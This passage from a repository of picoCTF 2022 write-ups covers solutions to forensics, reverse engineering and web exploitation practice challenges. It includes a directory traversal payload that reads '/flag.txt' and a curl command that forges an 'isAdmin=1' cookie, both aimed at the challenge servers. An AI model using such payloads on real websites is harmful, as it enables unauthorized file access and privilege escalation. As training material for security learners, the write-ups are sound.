| ``` 35 | 36 | For additional information, please see the references below. 37 | 38 | ## References 39 | 40 | - [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html) 41 | -------------------------------------------------------------------------------- /picoCTF_2022/Forensics/Packets_Primer.md: -------------------------------------------------------------------------------- 1 | # Packets Primer 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Forensics, pcap 12 | Author: LT 'SYREAL' JONES 13 | 14 | Description: 15 | Download the packet capture file and use packet analysis software to find the flag. 16 | 17 | Hints: 18 | 1. Wireshark, if you can install and use it, is probably the most beginner friendly packet analysis software product. 19 | ``` 20 | 21 | Challenge link: [https://play.picoctf.org/practice/challenge/286](https://play.picoctf.org/practice/challenge/286) 22 | 23 | ## Solution 24 | 25 | Open up the PCAP-file in [Wireshark](https://www.wireshark.org/). 26 | 27 | On easier challenges it can sometimes be worth searching for the flag in plaintext by entering a display filter of `tcp.payload contains "picoCTF"`. And it works here too. Packet number 4 matches and contains the flag. 28 | 29 | To construct/copy the flag you can either 30 | 31 | - See the packet's ASCII-details and construct the flag manually 32 | - Right-click on the 60-bytes of data and select Copy -> ...as Printable Text 33 | 34 | For additional information, please see the references below. 35 | 36 | ## References 37 | 38 | - [Wireshark - Homepage](https://www.wireshark.org/) 39 | - [Wireshark display filter syntax and reference](https://www.wireshark.org/docs/man-pages/wireshark-filter.html) 40 | -------------------------------------------------------------------------------- /picoCTF_2022/Forensics/README.md: -------------------------------------------------------------------------------- 1 | # Forensics Challenges 2 | 3 | ## Medium Forensics Challenges 4 | 5 | - [Enhance!](Enhance.md) 6 | - [File types](File_types.md) 7 | - [Lookey here](Lookey_here.md) 8 | - [Packets Primer](Packets_Primer.md) 9 | - [Redaction gone wrong](Redaction_gone_wrong.md) 10 | - [Sleuthkit Apprentice](Sleuthkit_Apprentice.md) 11 | - [Sleuthkit Intro](Sleuthkit_Intro.md) 12 | -------------------------------------------------------------------------------- /picoCTF_2022/Forensics/Redaction_gone_wrong.md: -------------------------------------------------------------------------------- 1 | # Redaction gone wrong 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | 6 | ## Challenge information 7 | 8 | ```text 9 | Level: Medium 10 | Tags: picoCTF 2022, Forensics 11 | Author: MUBARAK MIKAIL 12 | 13 | Description: 14 | Now you DON’T see me. 15 | This report has some critical data in it, some of which have been redacted correctly, while some were not. 16 | 17 | Can you find an important key that was not redacted properly? 18 | 19 | Hints: 20 | 1. How can you be sure of the redaction? 21 | ``` 22 | 23 | Challenge link: [https://play.picoctf.org/practice/challenge/290](https://play.picoctf.org/practice/challenge/290) 24 | 25 | ## Solution 26 | 27 | Open up the PDF-document in any PDF-reader that enables you to select and copy all text in the document. 28 | 29 | Then paste it into a text editor and you will get (apart from the flag redacted here) 30 | 31 | ```text 32 | Financial Report for ABC Labs, Kigali, Rwanda for the year 2021. 33 | Breakdown - Just painted over in MS word. 34 | Cost Benefit Analysis 35 | Credit Debit 36 | This is not the flag, keep looking 37 | Expenses from the 38 | picoCTF{} 39 | Redacted document. 40 | ``` 41 | -------------------------------------------------------------------------------- /picoCTF_2022/README.md: -------------------------------------------------------------------------------- 1 | # picoCTF 2022 Challenges 2 | 3 | ## Binary Exploitation Challenges 4 | 5 | ### Medium Binary Exploitation Challenges 6 | 7 | - [basic-file-exploit](Binary_Exploitation/basic-file-exploit.md) 8 | - [buffer overflow 0](Binary_Exploitation/buffer_overflow_0.md) 9 | - [buffer overflow 1](Binary_Exploitation/buffer_overflow_1.md) 10 | - [buffer overflow 2](Binary_Exploitation/buffer_overflow_2.md) 11 | - [CVE-XXXX-XXXX](Binary_Exploitation/CVE-XXXX-XXXX.md) 12 | - [RPS](Binary_Exploitation/RPS.md) 13 | 14 | ## Cryptography Challenges 15 | 16 | ### Medium Cryptography Challenges 17 | 18 | - [basic-mod1](Cryptography/basic-mod1.md) 19 | - [basic-mod2](Cryptography/basic-mod2.md) 20 | - [credstuff](Cryptography/credstuff.md) 21 | - [morse-code](Cryptography/morse-code.md) 22 | - [rail-fence](Cryptography/rail-fence.md) 23 | - [substitution0](Cryptography/substitution0.md) 24 | - [substitution1](Cryptography/substitution1.md) 25 | - [substitution2](Cryptography/substitution2.md) 26 | - [transposition-trial](Cryptography/transposition-trial.md) 27 | - [Vigenere](Cryptography/Vigenere.md) 28 | 29 | ## Forensics Challenges 30 | 31 | ### Medium Forensics Challenges 32 | 33 | - [Enhance!](Forensics/Enhance.md) 34 | - [File types](Forensics/File_types.md) 35 | - [Lookey here](Forensics/Lookey_here.md) 36 | - [Packets Primer](Forensics/Packets_Primer.md) 37 | - [Redaction gone wrong](Forensics/Redaction_gone_wrong.md) 38 | - [Sleuthkit Apprentice](Forensics/Sleuthkit_Apprentice.md) 39 | - [Sleuthkit Intro](Forensics/Sleuthkit_Intro.md) 40 | 41 | ## Reverse Engineering Challenges 42 | 43 | ### Medium Reverse Engineering Challenges 44 | 45 | - [bloat.py](Reverse_Engineering/bloat.py.md) 46 | - [file-run1](Reverse_Engineering/file-run1.md) 47 | - [file-run2](Reverse_Engineering/file-run2.md) 48 | - [Fresh Java](Reverse_Engineering/Fresh_Java.md) 49 | - [GDB Test Drive](Reverse_Engineering/GDB_Test_Drive.md) 50 | - [patchme.py](Reverse_Engineering/patchme.py.md) 51 | - [Safe Opener](Reverse_Engineering/Safe_Opener.md) 52 | - [unpackme.py](Reverse_Engineering/unpackme.py.md) 53 | 54 | ## Web Exploitation Challenges 55 | 56 | ### Easy Web Exploitation Challenges 57 | 58 | - [Includes](Web_Exploitation/Includes.md) 59 | - [Inspect HTML](Web_Exploitation/Inspect_HTML.md) 60 | - [Local Authority](Web_Exploitation/Local_Authority.md) 61 | 62 | ### Medium Web Exploitation Challenges 63 | 64 | - [Forbidden Paths](Web_Exploitation/Forbidden_Paths.md) 65 | - [Power Cookie](Web_Exploitation/Power_Cookie.md) 66 | - [Roboto Sans](Web_Exploitation/Roboto_Sans.md) 67 | - [Search source](Web_Exploitation/Search_source.md) 68 | - [Secrets](Web_Exploitation/Secrets.md) 69 | -------------------------------------------------------------------------------- /picoCTF_2022/Reverse_Engineering/GDB_Layout_Asm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2022/Reverse_Engineering/GDB_Layout_Asm.png -------------------------------------------------------------------------------- /picoCTF_2022/Reverse_Engineering/README.md: -------------------------------------------------------------------------------- 1 | # Reverse Engineering Challenges 2 | 3 | ## Medium Reverse Engineering Challenges 4 | 5 | - [bloat.py](bloat.py.md) 6 | - [file-run1](file-run1.md) 7 | - [file-run2](file-run2.md) 8 | - [Fresh Java](Fresh_Java.md) 9 | - [GDB Test Drive](GDB_Test_Drive.md) 10 | - [patchme.py](patchme.py.md) 11 | - [Safe Opener](Safe_Opener.md) 12 | - [unpackme.py](unpackme.py.md) 13 | -------------------------------------------------------------------------------- /picoCTF_2022/Reverse_Engineering/Safe_Opener.md: -------------------------------------------------------------------------------- 1 | # Safe Opener 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Reverse Engineering 12 | Author: MUBARAK MIKAIL 13 | 14 | Description: 15 | Can you open this safe? 16 | 17 | I forgot the key to my safe but this program is supposed to help me with retrieving the lost key. 18 | Can you help me unlock my safe? 19 | 20 | Put the password you recover into the picoCTF flag format like: 21 | picoCTF{password} 22 | 23 | Hints: 24 | (None) 25 | ``` 26 | 27 | Challenge link: [https://play.picoctf.org/practice/challenge/294](https://play.picoctf.org/practice/challenge/294) 28 | 29 | ## Solution 30 | 31 | Let's start by looking at the Java source code 32 | 33 | ```java 34 | import java.io.*; 35 | import java.util.*; 36 | public class SafeOpener { 37 | public static void main(String args[]) throws IOException { 38 | BufferedReader keyboard = new BufferedReader(new InputStreamReader(System.in)); 39 | Base64.Encoder encoder = Base64.getEncoder(); 40 | String encodedkey = ""; 41 | String key = ""; 42 | int i = 0; 43 | boolean isOpen; 44 | 45 | 46 | while (i < 3) { 47 | System.out.print("Enter password for the safe: "); 48 | key = keyboard.readLine(); 49 | 50 | encodedkey = encoder.encodeToString(key.getBytes()); 51 | System.out.println(encodedkey); 52 | 53 | isOpen = openSafe(encodedkey); 54 | if (!isOpen) { 55 | System.out.println("You have " + (2 - i) + " attempt(s) left"); 56 | i++; 57 | continue; 58 | } 59 | break; 60 | } 61 | } 62 | 63 | public static boolean openSafe(String password) { 64 | String encodedkey = "cGwzYXMzX2wzdF9tM18xbnQwX3RoM19zYWYz"; 65 | 66 | if (password.equals(encodedkey)) { 67 | System.out.println("Sesame open"); 68 | return true; 69 | } 70 | else { 71 | System.out.println("Password is incorrect\n"); 72 | return false; 73 | } 74 | } 75 | } 76 | ``` 77 | 78 | In the `main` function we see a Base64.Encoder initialized and in the `OpenSafe` function we see 79 | an encodedkey that looks like a [base64](https://en.wikipedia.org/wiki/Base64) encoded password: `cGwzYXMzX2wzdF9tM18xbnQwX3RoM19zYWYz`. 80 | 81 | I used [CyberChef's 'From Base64' recipe](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)) to decode the password. 82 | 83 | Finally, follow the instructions in the challenge description to create the flag. 84 | 85 | For additional information, please see the references below. 86 | 87 | ## References 88 | 89 | - [Base64 - Wikipedia](https://en.wikipedia.org/wiki/Base64) 90 | - [CyberChef - Homepage](https://gchq.github.io/CyberChef/) 91 | - [Java (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Java_(programming_language)) 92 | -------------------------------------------------------------------------------- /picoCTF_2022/Reverse_Engineering/file-run1.md: -------------------------------------------------------------------------------- 1 | # file-run1 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Reverse Engineering 12 | Author: WILL HONG 13 | 14 | Description: 15 | A program has been provided to you, what happens if you try to run it on the command line? 16 | 17 | Download the program here. 18 | 19 | Hints: 20 | 1. To run the program at all, you must make it executable (i.e. $ chmod +x run) 21 | 2. Try running it by adding a '.' in front of the path to the file (i.e. $ ./run) 22 | ``` 23 | 24 | Challenge link: [https://play.picoctf.org/practice/challenge/266](https://play.picoctf.org/practice/challenge/266) 25 | 26 | ## Solution 27 | 28 | This challenge is really simple and the hints give it all away 29 | 30 | ```bash 31 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/File_Run1] 32 | └─$ chmod +x run 33 | 34 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/File_Run1] 35 | └─$ ./run 36 | The flag is: picoCTF{} 37 | ``` 38 | 39 | If you need more information, please see the references below. 40 | 41 | ## References 42 | 43 | - [Linux path environment variable](https://linuxconfig.org/linux-path-environment-variable) 44 | - [Linux file permissions explained](https://www.redhat.com/sysadmin/linux-file-permissions-explained) 45 | -------------------------------------------------------------------------------- /picoCTF_2022/Reverse_Engineering/file-run2.md: -------------------------------------------------------------------------------- 1 | # file-run2 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Reverse Engineering 12 | Author: WILL HONG 13 | 14 | Description: 15 | Another program, but this time, it seems to want some input. 16 | What happens if you try to run it on the command line with input "Hello!"? 17 | 18 | Download the program here. 19 | 20 | Hints: 21 | 1. Try running it and add the phrase "Hello!" with a space in front (i.e. "./run Hello!") 22 | ``` 23 | 24 | Challenge link: [https://play.picoctf.org/practice/challenge/267](https://play.picoctf.org/practice/challenge/267) 25 | 26 | ## Solution 27 | 28 | Like the [previous challenge](file-run1.md) this challenge is really simple and the hint give it all away. 29 | 30 | But let's play around with it anyway 31 | 32 | ```bash 33 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/File_Run2] 34 | └─$ chmod +x run 35 | 36 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/File_Run2] 37 | └─$ ./run 38 | Run this file with only one argument 39 | 40 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/File_Run2] 41 | └─$ ./run My_argument 42 | Won't you say 'Hello!' to me first? 43 | 44 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/File_Run2] 45 | └─$ ./run Hello! 46 | The flag is: picoCTF{} 47 | ``` 48 | 49 | If you need more information, please see the references below. 50 | 51 | ## References 52 | 53 | - [Linux path environment variable](https://linuxconfig.org/linux-path-environment-variable) 54 | - [Linux file permissions explained](https://www.redhat.com/sysadmin/linux-file-permissions-explained) 55 | - [Linux Commands and arguments](https://www.w3resource.com/linux-system-administration/commands-and-arguments.php) 56 | -------------------------------------------------------------------------------- /picoCTF_2022/Reverse_Engineering/jadx-gui_decompilation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2022/Reverse_Engineering/jadx-gui_decompilation.png -------------------------------------------------------------------------------- /picoCTF_2022/Reverse_Engineering/patchme.py.md: -------------------------------------------------------------------------------- 1 | # patchme.py 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Reverse Engineering 12 | Author: LT 'SYREAL' JONES 13 | 14 | Description: 15 | Can you get the flag? 16 | 17 | Run this Python program in the same directory as this encrypted flag. 18 | 19 | Hints: 20 | (None) 21 | ``` 22 | 23 | Challenge link: [https://play.picoctf.org/practice/challenge/287](https://play.picoctf.org/practice/challenge/287) 24 | 25 | ## Solution 26 | 27 | Let's start by looking at the Python source code (with some empty lines removed) 28 | 29 | ```python 30 | ### THIS FUNCTION WILL NOT HELP YOU FIND THE FLAG --LT ######################## 31 | def str_xor(secret, key): 32 | #extend key to secret length 33 | new_key = key 34 | i = 0 35 | while len(new_key) < len(secret): 36 | new_key = new_key + key[i] 37 | i = (i + 1) % len(key) 38 | return "".join([chr(ord(secret_c) ^ ord(new_key_c)) for (secret_c,new_key_c) in zip(secret,new_key)]) 39 | ############################################################################### 40 | 41 | flag_enc = open('flag.txt.enc', 'rb').read() 42 | 43 | def level_1_pw_check(): 44 | user_pw = input("Please enter correct password for flag: ") 45 | if( user_pw == "ak98" + \ 46 | "-=90" + \ 47 | "adfjhgj321" + \ 48 | "sleuth9000"): 49 | print("Welcome back... your flag, user:") 50 | decryption = str_xor(flag_enc.decode(), "utilitarian") 51 | print(decryption) 52 | return 53 | print("That password is incorrect") 54 | 55 | level_1_pw_check() 56 | ``` 57 | 58 | In the `level_1_pw_check` function we see a password comparision for some strings concatenated together. 59 | The plus operator just adds the strings together resulting in the string `ak98-=90adfjhgj321sleuth9000`. 60 | 61 | Use this as the password when running the script and you get the flag 62 | 63 | ```bash 64 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/Patchme.py] 65 | └─$ python patchme.flag.py 66 | Please enter correct password for flag: ak98-=90adfjhgj321sleuth9000 67 | Welcome back... your flag, user: 68 | picoCTF{} 69 | ``` 70 | 71 | For additional information, please see the references below. 72 | 73 | ## References 74 | 75 | - [python - Linux manual page](https://linux.die.net/man/1/python) 76 | - [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language)) 77 | - [Python Tutorial - 7 Ways to Concatenate Strings in Python](https://www.pythontutorial.net/python-string-methods/python-string-concatenation/) 78 | - [Python - Common string operations](https://docs.python.org/3/library/string.html) 79 | -------------------------------------------------------------------------------- /picoCTF_2022/Reverse_Engineering/unpackme.py.md: -------------------------------------------------------------------------------- 1 | # unpackme.py 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Reverse Engineering, packing 12 | Author: LT 'SYREAL' JONES 13 | 14 | Description: 15 | Can you get the flag? 16 | 17 | Reverse engineer this Python program. 18 | 19 | Hints: 20 | (None) 21 | ``` 22 | 23 | Challenge link: [https://play.picoctf.org/practice/challenge/314](https://play.picoctf.org/practice/challenge/314) 24 | 25 | ## Solution 26 | 27 | Let's start by looking at the Python source code given (with some empty lines removed) 28 | 29 | ```python 30 | import base64 31 | from cryptography.fernet import Fernet 32 | 33 | payload = b'gAAAAABiMD06eCisTWoohiYL5jHGdCte5LAviTFguZQSIyRLAWICJpmdrgxhdTB923h6eksddKpKH41I5-HGzI6xGF_7eb_1u0S2Phw2NvYGTF1KzE1-AU66FfIW6QXWnCpPHOS9CatNBuFXuyjEAx86Rld2E7GjvuKEOJJXx_GZE2JgAxnDmvcewoksfjVCCAwNqzixpUPKkIET2xmO4EsDqK4CUG8_JxP0HwSEzW4PH-hVpZrkyse4EodFPsjs7NVJF0hL1_8bP1TCiEEnFn7hCoTRRvlpYQ==' 34 | 35 | key_str = 'correctstaplecorrectstaplecorrec' 36 | key_base64 = base64.b64encode(key_str.encode()) 37 | f = Fernet(key_base64) 38 | plain = f.decrypt(payload) 39 | exec(plain.decode()) 40 | ``` 41 | 42 | OK, so we have an encrypted payload that gets decrypted and then executed with the `exec` function. 43 | 44 | Let's run the script and see what happens 45 | 46 | ```bash 47 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/Unpackme.py] 48 | └─$ python unpackme.flag.py 49 | What's the password? test 50 | That password is incorrect. 51 | ``` 52 | 53 | Why not simply change the last `exec(plain.decode())` to `print(plain.decode())` and run the script again? 54 | Note, the flag is redacted below. 55 | 56 | ```bash 57 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/Unpackme.py] 58 | └─$ python unpackme.flag.py 59 | 60 | pw = input('What\'s the password? ') 61 | 62 | if pw == 'batteryhorse': 63 | print('picoCTF{}') 64 | else: 65 | print('That password is incorrect.') 66 | 67 | ``` 68 | 69 | And there is the flag. 70 | 71 | For additional information, please see the references below. 72 | 73 | ## References 74 | 75 | - [python - Linux manual page](https://linux.die.net/man/1/python) 76 | - [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language)) 77 | - [python exec() - programiz](https://www.programiz.com/python-programming/methods/built-in/exec) 78 | -------------------------------------------------------------------------------- /picoCTF_2022/Web_Exploitation/Forbidden_Paths.md: -------------------------------------------------------------------------------- 1 | # Forbidden Paths 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Web Exploitation 12 | Author: LT 'SYREAL' JONES 13 | 14 | Description: 15 | Can you get the flag? 16 | Here's the website. 17 | 18 | We know that the website files live in /usr/share/nginx/html/ and the flag is at /flag.txt 19 | but the website is filtering absolute file paths. Can you get past the filter to read the flag? 20 | 21 | Hints: 22 | (None) 23 | ``` 24 | 25 | Challenge link: [https://play.picoctf.org/practice/challenge/270](https://play.picoctf.org/practice/challenge/270) 26 | 27 | ## Solution 28 | 29 | The challenge name and description suggests that this challenge will be a [directory traversal attack](https://en.wikipedia.org/wiki/Directory_traversal_attack). 30 | 31 | ### Browse to the web site 32 | 33 | Browse to the web site and we get a webpage titled `Web eReader`. 34 | On the page there is a textbox and a `Read`-button. 35 | We seem to be able to read a file of our choice. 36 | 37 | From the challenge description we know that the root of the website is at `/usr/share/nginx/html/` and the flag is at `/flag.txt`. 38 | Relative to the web root the flag is at `../../../../flag.txt`. Let's try to read it. 39 | 40 | ### Get the flag 41 | 42 | Enter `../../../../flag.txt` in the textbox and press the `Read`-button and we get the flag. 43 | 44 | For additional information, please see the references below. 45 | 46 | ## References 47 | 48 | - [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack) 49 | - [File path traversal - PortSwigger](https://portswigger.net/kb/issues/00100300_file-path-traversal) 50 | - [Path Traversal - OWASP](https://owasp.org/www-community/attacks/Path_Traversal) 51 | -------------------------------------------------------------------------------- /picoCTF_2022/Web_Exploitation/Includes.md: -------------------------------------------------------------------------------- 1 | # Includes 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Easy 11 | Tags: picoCTF 2022, Web Exploitation, inspector 12 | Author: LT 'SYREAL' JONES 13 | 14 | Description: 15 | Can you get the flag? 16 | 17 | Go to this website and see what you can discover. 18 | 19 | Hints: 20 | 1. Is there more code than what the inspector initially shows? 21 | ``` 22 | 23 | Challenge link: [https://play.picoctf.org/practice/challenge/274](https://play.picoctf.org/practice/challenge/274) 24 | 25 | ## Solution 26 | 27 | Browse to the web site and then right-click and select 'View page source'. 28 | You will see the following HTML-code 29 | 30 | ```html 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | On Includes 39 | 40 | 41 | 42 | 43 |

On Includes

44 |

Many programming languages and other computer files have a directive, 45 | often called include (sometimes copy or import), that causes the 46 | contents of a second file to be inserted into the original file. These 47 | included files are called copybooks or header files. They are often used 48 | to define the physical layout of program data, pieces of procedural code 49 | and/or forward declarations while promoting encapsulation and the reuse 50 | of code.

51 |
52 |

Source: Wikipedia on Include directive

53 | 54 | 55 | 56 | ``` 57 | 58 | There is no flag visible here, but there are two additional files to check out. 59 | 60 | Click on the 'style.css' link to view that file 61 | 62 | ```css 63 | body { 64 | background-color: lightblue; 65 | } 66 | 67 | /* picoCTF{1nclu51v17y_1of2_ */ 68 | ``` 69 | 70 | There is the first part of the flag as a comment. 71 | 72 | Now go back to the HTML-source and click on 'script.js' link 73 | 74 | ```javascript 75 | function greetings() 76 | { 77 | alert("This code is in a separate file!"); 78 | } 79 | 80 | // f7w_2of2_df589022} 81 | ``` 82 | 83 | There is the second part of the flag as a comment. 84 | 85 | Combine the two parts and you have the flag. 86 | 87 | For additional information, please see the references below. 88 | 89 | ## References 90 | 91 | - [CSS - Wikipedia](https://en.wikipedia.org/wiki/CSS) 92 | - [HTML - Wikipedia](https://en.wikipedia.org/wiki/HTML) 93 | - [JavaScript - Wikipedia](https://en.wikipedia.org/wiki/JavaScript) 94 | -------------------------------------------------------------------------------- /picoCTF_2022/Web_Exploitation/Inspect_HTML.md: -------------------------------------------------------------------------------- 1 | # Inspect HTML 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Easy 11 | Tags: picoCTF 2022, Web Exploitation, inspector 12 | Author: LT 'SYREAL' JONES 13 | 14 | Description: 15 | Can you get the flag? 16 | 17 | Go to this website and see what you can discover. 18 | 19 | Hints: 20 | 1. What is the web inspector in web browsers? 21 | ``` 22 | 23 | Challenge link: [https://play.picoctf.org/practice/challenge/275](https://play.picoctf.org/practice/challenge/275) 24 | 25 | ## Solution 26 | 27 | Let's start by browsing to the web site and check the HTML source code. 28 | Press `CTRL + U` or right-click anywhere on the background and select `View page source` 29 | 30 | ```html 31 | 32 | 33 | 34 | 35 | 36 | 37 | On Histiaeus 38 | 39 | 40 |

On Histiaeus

41 |

However, according to Herodotus, Histiaeus was unhappy having to stay in 42 | Susa, and made plans to return to his position as King of Miletus by 43 | instigating a revolt in Ionia. In 499 BC, he shaved the head of his 44 | most trusted slave, tattooed a message on his head, and then waited for 45 | his hair to grow back. The slave was then sent to Aristagoras, who was 46 | instructed to shave the slave's head again and read the message, which 47 | told him to revolt against the Persians.

48 |
49 |

Source: Wikipedia on Histiaeus

50 | 51 | 52 | 53 | ``` 54 | 55 | The flag is in a comment at the end of the HTML-source (but redacted here). 56 | 57 | For additional information, please see the references below. 58 | 59 | ## References 60 | 61 | - [HTML - Wikipedia](https://en.wikipedia.org/wiki/HTML) 62 | -------------------------------------------------------------------------------- /picoCTF_2022/Web_Exploitation/Power_Cookie.md: -------------------------------------------------------------------------------- 1 | # Power Cookie 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Web Exploitation, cookie 12 | Author: LT 'SYREAL' JONES 13 | 14 | Description: 15 | Can you get the flag? 16 | Go to this website and see what you can discover. 17 | 18 | Hints: 19 | 1. Do you know how to modify cookies? 20 | ``` 21 | 22 | Challenge link: [https://play.picoctf.org/practice/challenge/288](https://play.picoctf.org/practice/challenge/288) 23 | 24 | ## Solution 25 | 26 | ### Browse to the web site 27 | 28 | Browse to the web site and we get a web page titled `Online Gradebook`. 29 | On the page there is a `Continue as guest`-button. 30 | Press the button and we redirected to `/check.php` where the text `We apologize, but we have no guest services at the moment.` is shown. 31 | 32 | ### Check for cookies 33 | 34 | Press F12 to open DevTools and go to the `Application` tab. 35 | Under `Storage` and then `Cookies` select the web site. 36 | Note that there is a cookie named `isAdmin` with the value of `0`. 37 | 38 | ### Get the flag in the browser 39 | 40 | Set the cookie value to 1 and reload the web page by pressing `F5` to get the flag. 41 | 42 | ### Get the flag with curl 43 | 44 | Now that we have all the information we need to get the flag we can automate it with `curl` and `grep` 45 | 46 | ```bash 47 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2022/Web_Exploitation/Power_Cookie] 48 | └─$ curl -s --cookie "isAdmin=1" http://saturn.picoctf.net:63041/check.php | grep -oE 'picoCTF{.*}' 49 | picoCTF{} 50 | ``` 51 | 52 | For additional information, please see the references below. 53 | 54 | ## References 55 | 56 | - [curl - Linux manual page](https://man7.org/linux/man-pages/man1/curl.1.html) 57 | - [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html) 58 | - [HTTP cookie - Wikipedia](https://en.wikipedia.org/wiki/HTTP_cookie) 59 | -------------------------------------------------------------------------------- /picoCTF_2022/Web_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Web Exploitation Challenges 2 | 3 | ## Easy Web Exploitation Challenges 4 | 5 | - [Includes](Includes.md) 6 | - [Inspect HTML](Inspect_HTML.md) 7 | - [Local Authority](Local_Authority.md) 8 | 9 | ## Medium Web Exploitation Challenges 10 | 11 | - [Forbidden Paths](Forbidden_Paths.md) 12 | - [Power Cookie](Power_Cookie.md) 13 | - [Roboto Sans](Roboto_Sans.md) 14 | - [Search source](Search_source.md) 15 | - [Secrets](Secrets.md) 16 | -------------------------------------------------------------------------------- /picoCTF_2022/Web_Exploitation/Roboto_Sans.md: -------------------------------------------------------------------------------- 1 | # Roboto Sans 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2022, Web Exploitation 12 | Author: MUBARAK MIKAIL 13 | 14 | Description: 15 | The flag is somewhere on this web application not necessarily on the website. Find it. 16 | Check this out. 17 | 18 | Hints: 19 | (None) 20 | ``` 21 | 22 | Challenge link: [https://play.picoctf.org/practice/challenge/291](https://play.picoctf.org/practice/challenge/291) 23 | 24 | ## Solution 25 | 26 | The challenge name suggests that we should investigate the [robots.txt](https://en.wikipedia.org/wiki/Robots.txt) file. 27 | 28 | ### Check the robots.txt file on the web site 29 | 30 | Get the `robots.txt` file on the web site with `curl` 31 | 32 | ```bash 33 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2022/Web_Exploitation/Roboto_Sans] 34 | └─$ curl http://saturn.picoctf.net:59901/robots.txt 35 | User-agent * 36 | Disallow: /cgi-bin/ 37 | Think you have seen your flag or want to keep looking. 38 | 39 | ZmxhZzEudHh0;anMvbXlmaW 40 | anMvbXlmaWxlLnR4dA== 41 | svssshjweuiwl;oiho.bsvdaslejg 42 | Disallow: /wp-admin/ 43 | ``` 44 | 45 | Hhm, we have a number of encoded strings. Some of them seems to be [base64 encoded](https://en.wikipedia.org/wiki/Base64). 46 | 47 | ### Try to decode the base64 encoded data 48 | 49 | Trying different combinations of the encoded strings above we get a lot of `invalid input` errors. 50 | But we get the following readable data 51 | 52 | ```bash 53 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2022/Web_Exploitation/Roboto_Sans] 54 | └─$ echo "ZmxhZzEudHh0" | base64 -d 55 | flag1.txt 56 | 57 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2022/Web_Exploitation/Roboto_Sans] 58 | └─$ echo "anMvbXlmaWxlLnR4dA==" | base64 -d 59 | js/myfile.txt 60 | ``` 61 | 62 | ### Get the flag 63 | 64 | So we have two possible locations for the flag file: 65 | 66 | - flag1.txt 67 | - js/myfile.txt 68 | 69 | Let's try both of them. 70 | 71 | ```bash 72 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2022/Web_Exploitation/Roboto_Sans] 73 | └─$ curl http://saturn.picoctf.net:59901/flag1.txt 74 | 75 | 404 Not Found 76 | 77 |

404 Not Found

78 |
nginx/1.21.6
